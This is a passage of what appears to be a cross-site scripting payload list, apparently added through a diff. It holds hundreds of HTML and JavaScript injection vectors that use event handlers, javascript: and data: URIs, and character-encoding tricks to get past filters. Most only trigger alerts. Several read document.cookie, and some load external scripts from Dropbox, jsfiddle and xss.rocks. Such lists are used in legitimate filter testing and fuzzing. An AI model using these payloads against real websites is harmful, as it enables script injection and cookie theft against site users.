onmousemove="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x 
onmouseout="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x 
onseeked="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> +<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; +<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> +<INPUT TYPE="BUTTON" action="alert('XSS')"/> +"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> +"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> +"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF +"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1> +"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1> +><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr +g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 +<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> +"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> +"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> +<iframe src=http://xss.rocks/scriptlet.html < +<IFRAME 
SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<iframe src="&Tab;javascript:prompt(1)&Tab;"> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt >alert&lpar;1&rpar; {Opera} +<img/src=`` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=``&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? +<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /**/>/**/alert(1)/**/</script /**/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'> +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( 
+&#00;</form><input type&#61;"date" onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN +<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe// src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a 
href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a 
href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click 
Me</a> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body 
onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet 
onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html 
onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> 
+<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div 
style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x 
